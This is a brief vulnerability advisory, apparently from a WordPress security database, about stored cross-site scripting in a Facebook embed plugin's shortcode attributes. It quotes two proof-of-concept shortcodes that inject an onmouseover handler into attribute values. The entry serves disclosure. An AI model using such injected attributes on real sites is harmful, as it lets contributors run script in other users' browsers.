Description The plugin does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks
v < 3.1.1 - [fb_plugin video href=“https://www.facebook.com/facebook/videos/10153231379946729/” autoplay=‘" onmouseover=“alert(/XSS/)”’ ] v < 3.1.2 - [fb_plugin video adaptive=“true” href=“https://www.facebook.com/facebook/videos/10153231379946729/” width=‘"onmouseover=alert(/XSS/)//’]
CPE | Name | Operator | Version |
---|---|---|---|
eq | 3.1.2 |